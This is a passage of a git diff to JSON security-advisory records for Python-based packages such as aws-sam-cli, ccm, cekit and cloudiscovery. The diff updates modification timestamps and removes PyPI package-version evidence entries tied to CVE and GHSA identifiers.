"2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-45409.json b/advisories/BREW-aws-sam-cli-CVE-2026-45409.json index a5b51ca6d44..29ce76bce17 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-45409.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-45409", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-59890.json b/advisories/BREW-aws-sam-cli-CVE-2026-59890.json index 58ca3739147..3e9fd4d9809 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-59890.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-59890", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2013-1633.json b/advisories/BREW-ccm-CVE-2013-1633.json index 4dc765434ed..06a1acc358b 100644 --- a/advisories/BREW-ccm-CVE-2013-1633.json +++ b/advisories/BREW-ccm-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2013-1633", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2017-18342.json b/advisories/BREW-ccm-CVE-2017-18342.json index aa918a2299e..3dd37cdabd0 100644 --- a/advisories/BREW-ccm-CVE-2017-18342.json +++ b/advisories/BREW-ccm-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2017-18342", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2019-20477.json b/advisories/BREW-ccm-CVE-2019-20477.json index 4d2b82bb94a..622c33ef4c1 100644 --- a/advisories/BREW-ccm-CVE-2019-20477.json +++ b/advisories/BREW-ccm-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2019-20477", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2020-14343.json b/advisories/BREW-ccm-CVE-2020-14343.json index bf13084e1dc..0cdf5d46ba8 100644 --- a/advisories/BREW-ccm-CVE-2020-14343.json +++ b/advisories/BREW-ccm-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2020-14343", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2020-1747.json b/advisories/BREW-ccm-CVE-2020-1747.json index 4c7f018c193..53d9cd6f9af 100644 --- a/advisories/BREW-ccm-CVE-2020-1747.json +++ b/advisories/BREW-ccm-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2020-1747", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2022-40897.json b/advisories/BREW-ccm-CVE-2022-40897.json index c4b5bd4b210..45be1810367 100644 --- a/advisories/BREW-ccm-CVE-2022-40897.json +++ b/advisories/BREW-ccm-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2022-40897", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2024-6345.json b/advisories/BREW-ccm-CVE-2024-6345.json index 59cdcf72d4f..dd9d936bd18 100644 --- a/advisories/BREW-ccm-CVE-2024-6345.json +++ b/advisories/BREW-ccm-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2024-6345", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2025-47273.json b/advisories/BREW-ccm-CVE-2025-47273.json index 9e480cddbf6..af61ce027a8 100644 --- a/advisories/BREW-ccm-CVE-2025-47273.json +++ b/advisories/BREW-ccm-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2025-47273", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2026-59890.json b/advisories/BREW-ccm-CVE-2026-59890.json index fa168485f99..00027f94469 100644 --- a/advisories/BREW-ccm-CVE-2026-59890.json +++ b/advisories/BREW-ccm-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2026-59890", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2014-0012.json b/advisories/BREW-cekit-CVE-2014-0012.json index 69125e1800a..3ea1c597e8c 100644 --- a/advisories/BREW-cekit-CVE-2014-0012.json +++ b/advisories/BREW-cekit-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2014-0012", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2014-1402.json b/advisories/BREW-cekit-CVE-2014-1402.json index 9dac14ee730..c889afb5117 100644 --- a/advisories/BREW-cekit-CVE-2014-1402.json +++ b/advisories/BREW-cekit-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2014-1402", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2016-10745.json b/advisories/BREW-cekit-CVE-2016-10745.json index ed0e54337b0..6f58d1628fa 100644 --- a/advisories/BREW-cekit-CVE-2016-10745.json +++ b/advisories/BREW-cekit-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2016-10745", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2017-18342.json b/advisories/BREW-cekit-CVE-2017-18342.json index b799e20e812..1a0566a96ee 100644 --- a/advisories/BREW-cekit-CVE-2017-18342.json +++ b/advisories/BREW-cekit-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2017-18342", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2019-10906.json b/advisories/BREW-cekit-CVE-2019-10906.json index 7a60aa0d9e3..cf89dfc44f0 100644 --- a/advisories/BREW-cekit-CVE-2019-10906.json +++ b/advisories/BREW-cekit-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2019-10906", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2019-20477.json b/advisories/BREW-cekit-CVE-2019-20477.json index 0988040c30e..01791a52812 100644 --- a/advisories/BREW-cekit-CVE-2019-20477.json +++ b/advisories/BREW-cekit-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2019-20477", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2020-14343.json b/advisories/BREW-cekit-CVE-2020-14343.json index d96f6630602..494cb4a35ff 100644 --- a/advisories/BREW-cekit-CVE-2020-14343.json +++ b/advisories/BREW-cekit-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2020-14343", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2020-1747.json b/advisories/BREW-cekit-CVE-2020-1747.json index 7927d7e269b..78268421e37 100644 --- a/advisories/BREW-cekit-CVE-2020-1747.json +++ b/advisories/BREW-cekit-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2020-1747", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2020-28493.json b/advisories/BREW-cekit-CVE-2020-28493.json index 9fbb73fd160..1a37b91c69f 100644 --- a/advisories/BREW-cekit-CVE-2020-28493.json +++ b/advisories/BREW-cekit-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2020-28493", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2024-22195.json b/advisories/BREW-cekit-CVE-2024-22195.json index da53192d3ef..7480ad0fa14 100644 --- a/advisories/BREW-cekit-CVE-2024-22195.json +++ b/advisories/BREW-cekit-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2024-22195", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2024-34064.json b/advisories/BREW-cekit-CVE-2024-34064.json index 8f1382d6fcc..57875217735 100644 --- a/advisories/BREW-cekit-CVE-2024-34064.json +++ b/advisories/BREW-cekit-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2024-34064", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2024-56201.json b/advisories/BREW-cekit-CVE-2024-56201.json index 0fdc5527de4..0bc1f343095 100644 --- a/advisories/BREW-cekit-CVE-2024-56201.json +++ b/advisories/BREW-cekit-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2024-56201", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2024-56326.json b/advisories/BREW-cekit-CVE-2024-56326.json index 613bacd78ca..53a1385eabd 100644 --- a/advisories/BREW-cekit-CVE-2024-56326.json +++ b/advisories/BREW-cekit-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2024-56326", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2025-27516.json b/advisories/BREW-cekit-CVE-2025-27516.json index 83382d6c8c8..93f10308cc3 100644 --- a/advisories/BREW-cekit-CVE-2025-27516.json +++ b/advisories/BREW-cekit-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2025-27516", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2011-4617.json b/advisories/BREW-cloudiscovery-CVE-2011-4617.json index 28af3eb98ad..061b5ea649d 100644 --- a/advisories/BREW-cloudiscovery-CVE-2011-4617.json +++ b/advisories/BREW-cloudiscovery-CVE-2011-4617.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2011-4617", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-3jhc-wjqf-5f2c", "CVE-2011-4617", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "virtualenv", - "subject_version": "20.31.2", - "key": "pkg:pypi/virtualenv@20.31.2", - "resource": "virtualenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2014-0012.json b/advisories/BREW-cloudiscovery-CVE-2014-0012.json index bffd89baf58..2bafe6f7488 100644 --- a/advisories/BREW-cloudiscovery-CVE-2014-0012.json +++ b/advisories/BREW-cloudiscovery-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2014-0012", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2014-1402.json b/advisories/BREW-cloudiscovery-CVE-2014-1402.json index 610f0f35c28..be775f81882 100644 --- a/advisories/BREW-cloudiscovery-CVE-2014-1402.json +++ b/advisories/BREW-cloudiscovery-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2014-1402", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2016-10745.json b/advisories/BREW-cloudiscovery-CVE-2016-10745.json index 70b42fcdaf5..f097201a174 100644 --- a/advisories/BREW-cloudiscovery-CVE-2016-10745.json +++ b/advisories/BREW-cloudiscovery-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2016-10745", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2016-9015.json b/advisories/BREW-cloudiscovery-CVE-2016-9015.json index d749980fc1f..6e26287d30b 100644 --- a/advisories/BREW-cloudiscovery-CVE-2016-9015.json +++ b/advisories/BREW-cloudiscovery-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2016-9015", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2017-18342.json b/advisories/BREW-cloudiscovery-CVE-2017-18342.json index 2718c898ff3..520b1e18e56 100644 --- a/advisories/BREW-cloudiscovery-CVE-2017-18342.json +++ b/advisories/BREW-cloudiscovery-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2017-18342", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2018-20060.json b/advisories/BREW-cloudiscovery-CVE-2018-20060.json index e187e0c69f2..25c4fdcc631 100644 --- a/advisories/BREW-cloudiscovery-CVE-2018-20060.json +++ b/advisories/BREW-cloudiscovery-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2018-20060", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2018-25091.json b/advisories/BREW-cloudiscovery-CVE-2018-25091.json index b11b752fec6..dccc6b75a98 100644 --- a/advisories/BREW-cloudiscovery-CVE-2018-25091.json +++ b/advisories/BREW-cloudiscovery-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2018-25091", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2019-10906.json b/advisories/BREW-cloudiscovery-CVE-2019-10906.json index ca38d9707dd..8974265aa30 100644 --- a/advisories/BREW-cloudiscovery-CVE-2019-10906.json +++ b/advisories/BREW-cloudiscovery-CVE-2019-10906.json @@ 